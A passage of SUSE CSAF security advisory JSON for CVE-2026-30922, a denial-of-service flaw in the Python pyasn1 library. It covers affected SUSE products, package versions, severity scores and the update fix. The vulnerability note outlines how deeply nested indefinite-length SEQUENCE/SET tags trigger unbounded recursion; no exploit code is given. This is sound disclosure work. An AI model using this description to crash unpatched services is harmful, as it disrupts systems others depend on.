"product_id": "python311-pyasn1-0.5.0-150400.12.13.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Module for Public Cloud 15 SP4",
"product": {
"name": "SUSE Linux Enterprise Module for Public Cloud 15 SP4",
"product_id": "SUSE Linux Enterprise Module for Public Cloud 15 SP4",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-public-cloud:15:sp4"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Module for Python 3 15 SP7",
"product": {
"name": "SUSE Linux Enterprise Module for Python 3 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Python 3 15 SP7",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-python3:15:sp7"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle_hpc-espos:15:sp4"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle_hpc-ltss:15:sp4"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle_hpc-espos:15:sp5"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle_hpc-ltss:15:sp5"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server 15 SP4-LTSS",
"product": {
"name": "SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles-ltss:15:sp4"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server 15 SP5-LTSS",
"product": {
"name": "SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles-ltss:15:sp5"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server 15 SP6-LTSS",
"product": {
"name": "SUSE Linux Enterprise Server 15 SP6-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP6-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles-ltss:15:sp6"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product": {
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles_sap:15:sp4"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product": {
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles_sap:15:sp5"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP6",
"product": {
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP6",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP6",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles_sap:15:sp6"
}
}
},
{
"category": "product_name",
"name": "openSUSE Leap 15.6",
"product": {
"name": "openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:leap:15.6"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-pyasn1-0.5.0-150400.12.13.1.noarch as component of SUSE Linux Enterprise Module for Public Cloud 15 SP4",
"product_id": "SUSE Linux Enterprise Module for Public Cloud 15 SP4:python311-pyasn1-0.5.0-150400.12.13.1.noarch"
},
"product_reference": "python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Public Cloud 15 SP4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-pyasn1-0.5.0-150400.12.13.1.noarch as component of SUSE Linux Enterprise Module for Python 3 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Python 3 15 SP7:python311-pyasn1-0.5.0-150400.12.13.1.noarch"
},
"product_reference": "python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Python 3 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-pyasn1-0.5.0-150400.12.13.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:python311-pyasn1-0.5.0-150400.12.13.1.noarch"
},
"product_reference": "python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-pyasn1-0.5.0-150400.12.13.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:python311-pyasn1-0.5.0-150400.12.13.1.noarch"
},
"product_reference": "python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-pyasn1-0.5.0-150400.12.13.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:python311-pyasn1-0.5.0-150400.12.13.1.noarch"
},
"product_reference": "python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-pyasn1-0.5.0-150400.12.13.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:python311-pyasn1-0.5.0-150400.12.13.1.noarch"
},
"product_reference": "python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-pyasn1-0.5.0-150400.12.13.1.noarch as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:python311-pyasn1-0.5.0-150400.12.13.1.noarch"
},
"product_reference": "python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-pyasn1-0.5.0-150400.12.13.1.noarch as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:python311-pyasn1-0.5.0-150400.12.13.1.noarch"
},
"product_reference": "python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-pyasn1-0.5.0-150400.12.13.1.noarch as component of SUSE Linux Enterprise Server 15 SP6-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP6-LTSS:python311-pyasn1-0.5.0-150400.12.13.1.noarch"
},
"product_reference": "python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP6-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-pyasn1-0.5.0-150400.12.13.1.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4:python311-pyasn1-0.5.0-150400.12.13.1.noarch"
},
"product_reference": "python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-pyasn1-0.5.0-150400.12.13.1.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP5:python311-pyasn1-0.5.0-150400.12.13.1.noarch"
},
"product_reference": "python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-pyasn1-0.5.0-150400.12.13.1.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP6",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP6:python311-pyasn1-0.5.0-150400.12.13.1.noarch"
},
"product_reference": "python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-pyasn1-0.5.0-150400.12.13.1.noarch as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:python311-pyasn1-0.5.0-150400.12.13.1.noarch"
},
"product_reference": "python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"relates_to_product_reference": "openSUSE Leap 15.6"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-30922",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-30922"
}
],
"notes": [
{
"category": "general",
"text": "pyasn1 is a generic ASN.1 library for Python. Prior to 0.6.3, the `pyasn1` library is vulnerable to a Denial of Service (DoS) attack caused by uncontrolled recursion when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing thousands of nested `SEQUENCE` (`0x30`) or `SET` (`0x31`) tags with \"Indefinite Length\" (`0x80`) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a `RecursionError` or consumes all available memory (OOM), crashing the host application. This is a distinct vulnerability from CVE-2026-23490 (which addressed integer overflows in OID decoding). The fix for CVE-2026-23490 (`MAX_OID_ARC_CONTINUATION_OCTETS`) does not mitigate this recursion issue. Version 0.6.3 fixes this specific issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP4:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP7:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise Server 15 SP6-LTSS:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"openSUSE Leap 15.6:python311-pyasn1-0.5.0-150400.12.13.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-30922",
"url": "https://www.suse.com/security/cve/CVE-2026-30922"
},
{
"category": "external",
"summary": "SUSE Bug 1259803 for CVE-2026-30922",
"url": "https://bugzilla.suse.com/1259803"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP4:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP7:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise Server 15 SP6-LTSS:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"openSUSE Leap 15.6:python311-pyasn1-0.5.0-150400.12.13.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP4:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP7:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise Server 15 SP6-LTSS:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:python311-pyasn1-0.5.0-150400.12.13.1.noarch",
"openSUSE Leap 15.6:python311-pyasn1-0.5.0-150400.12.13.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T12:41:27Z",
"details": "important"
}
],
"title": "CVE-2026-30922"
}
]
}
SUSE-SU-2026:1076-1
Vulnerability from csaf_suse - Published: 2026-03-26 12:42 - Updated: 2026-03-26 12:42
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for python-pyasn1",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for python-pyasn1 fixes the following issues:\n\n- CVE-2026-30922: Denial of Service via Unbounded Recursion (bsc#1259803).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2026-1076,SUSE-SLE-SERVER-12-SP5-LTSS-2026-1076,SUSE-SLE-SERVER-12-SP5-LTSS-EXTENDED-SECURITY-2026-1076",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_1076-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:1076-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261076-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:1076-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/024957.html"
},
{
"category": "self",
"summary": "SUSE Bug 1259803",
"url": "https://bugzilla.suse.com/1259803"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-30922 page",
"url": "https://www.suse.com/security/cve/CVE-2026-30922/"
}
],
"title": "Security update for python-pyasn1",
"tracking": {
"current_release_date": "2026-03-26T12:42:05Z",
"generator": {
"date": "2026-03-26T12:42:05Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:1076-1",
"initial_release_date": "2026-03-26T12:42:05Z",
"revision_history": [
{
"date": "2026-03-26T12:42:05Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "python-pyasn1-0.1.9-4.14.1.noarch",
"product": {
"name": "python-pyasn1-0.1.9-4.14.1.noarch",
"product_id": "python-pyasn1-0.1.9-4.14.1.noarch"
}
},
{
"category": "product_version",
"name": "python3-pyasn1-0.1.9-4.14.1.noarch",
"product": {
"name": "python3-pyasn1-0.1.9-4.14.1.noarch",
"product_id": "python3-pyasn1-0.1.9-4.14.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server 12 SP5-LTSS",
"product": {
"name": "SUSE Linux Enterprise Server 12 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 12 SP5-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles-ltss:12:sp5"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server LTSS Extended Security 12 SP5",
"product": {
"name": "SUSE Linux Enterprise Server LTSS Extended Security 12 SP5",
"product_id": "SUSE Linux Enterprise Server LTSS Extended Security 12 SP5",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles-ltss-extended-security:12:sp5"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "python-pyasn1-0.1.9-4.14.1.noarch as component of SUSE Linux Enterprise Server 12 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 12 SP5-LTSS:python-pyasn1-0.1.9-4.14.1.noarch"
},
"product_reference": "python-pyasn1-0.1.9-4.14.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 12 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pyasn1-0.1.9-4.14.1.noarch as component of SUSE Linux Enterprise Server 12 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 12 SP5-LTSS:python3-pyasn1-0.1.9-4.14.1.noarch"
},
"product_reference": "python3-pyasn1-0.1.9-4.14.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 12 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-pyasn1-0.1.9-4.14.1.noarch as component of SUSE Linux Enterprise Server LTSS Extended Security 12 SP5",
"product_id": "SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:python-pyasn1-0.1.9-4.14.1.noarch"
},
"product_reference": "python-pyasn1-0.1.9-4.14.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server LTSS Extended Security 12 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pyasn1-0.1.9-4.14.1.noarch as component of SUSE Linux Enterprise Server LTSS Extended Security 12 SP5",
"product_id": "SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:python3-pyasn1-0.1.9-4.14.1.noarch"
},
"product_reference": "python3-pyasn1-0.1.9-4.14.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server LTSS Extended Security 12 SP5"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-30922",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-30922"
}
],
"notes": [
{
"category": "general",
"text": "pyasn1 is a generic ASN.1 library for Python. Prior to 0.6.3, the `pyasn1` library is vulnerable to a Denial of Service (DoS) attack caused by uncontrolled recursion when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing thousands of nested `SEQUENCE` (`0x30`) or `SET` (`0x31`) tags with \"Indefinite Length\" (`0x80`) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a `RecursionError` or consumes all available memory (OOM), crashing the host application. This is a distinct vulnerability from CVE-2026-23490 (which addressed integer overflows in OID decoding). The fix for CVE-2026-23490 (`MAX_OID_ARC_CONTINUATION_OCTETS`) does not mitigate this recursion issue. Version 0.6.3 fixes this specific issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 12 SP5-LTSS:python-pyasn1-0.1.9-4.14.1.noarch",
"SUSE Linux Enterprise Server 12 SP5-LTSS:python3-pyasn1-0.1.9-4.14.1.noarch",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:python-pyasn1-0.1.9-4.14.1.noarch",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:python3-pyasn1-0.1.9-4.14.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-30922",
"url": "https://www.suse.com/security/cve/CVE-2026-30922"
},
{
"category": "external",
"summary": "SUSE Bug 1259803 for CVE-2026-30922",
"url": "https://bugzilla.suse.com/1259803"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 12 SP5-LTSS:python-pyasn1-0.1.9-4.14.1.noarch",
"SUSE Linux Enterprise Server 12 SP5-LTSS:python3-pyasn1-0.1.9-4.14.1.noarch",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:python-pyasn1-0.1.9-4.14.1.noarch",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:python3-pyasn1-0.1.9-4.14.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 12 SP5-LTSS:python-pyasn1-0.1.9-4.14.1.noarch",
"SUSE Linux Enterprise Server 12 SP5-LTSS:python3-pyasn1-0.1.9-4.14.1.noarch",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:python-pyasn1-0.1.9-4.14.1.noarch",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:python3-pyasn1-0.1.9-4.14.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T12:42:05Z",
"details": "important"
}
],
"title": "CVE-2026-30922"
}
]
}
SUSE-SU-2026:20835-1
Vulnerability from csaf_suse - Published: 2026-03-25 03:09 - Updated: 2026-03-25 03:09
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for python-pyasn1",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for python-pyasn1 fixes the following issue:\n\n- CVE-2026-30922: Denial of Service via Unbounded Recursion (bsc#1259803).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-SL-Micro-6.2-438",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_20835-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:20835-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620835-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:20835-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/025002.html"
},
{
"category": "self",
"summary": "SUSE Bug 1259803",
"url": "https://bugzilla.suse.com/1259803"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-30922 page",
"url": "https://www.suse.com/security/cve/CVE-2026-30922/"
}
],
"title": "Security update for python-pyasn1",
"tracking": {
"current_release_date": "2026-03-25T03:09:26Z",
"generator": {
"date": "2026-03-25T03:09:26Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:20835-1",
"initial_release_date": "2026-03-25T03:09:26Z",
"revision_history": [
{
"date": "2026-03-25T03:09:26Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "python313-pyasn1-0.6.1-160000.4.1.noarch",
"product": {
"name": "python313-pyasn1-0.6.1-160000.4.1.noarch",
"product_id": "python313-pyasn1-0.6.1-160000.4.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Micro 6.2",
"product": {
"name": "SUSE Linux Micro 6.2",
"product_id": "SUSE Linux Micro 6.2",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles:16:16.0:transactional"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-pyasn1-0.6.1-160000.4.1.noarch as component of SUSE Linux Micro 6.2",
"product_id": "SUSE Linux Micro 6.2:python313-pyasn1-0.6.1-160000.4.1.noarch"
},
"product_reference": "python313-pyasn1-0.6.1-160000.4.1.noarch",
"relates_to_product_reference": "SUSE Linux Micro 6.2"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-30922",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-30922"
}
],
"notes": [
{
"category": "general",
"text": "pyasn1 is a generic ASN.1 library for Python. Prior to 0.6.3, the `pyasn1` library is vulnerable to a Denial of Service (DoS) attack caused by uncontrolled recursion when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing thousands of nested `SEQUENCE` (`0x30`) or `SET` (`0x31`) tags with \"Indefinite Length\" (`0x80`) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a `RecursionError` or consumes all available memory (OOM), crashing the host application. This is a distinct vulnerability from CVE-2026-23490 (which addressed integer overflows in OID decoding). The fix for CVE-2026-23490 (`MAX_OID_ARC_CONTINUATION_OCTETS`) does not mitigate this recursion issue. Version 0.6.3 fixes this specific issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:python313-pyasn1-0.6.1-160000.4.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-30922",
"url": "https://www.suse.com/security/cve/CVE-2026-30922"
},
{
"category": "external",
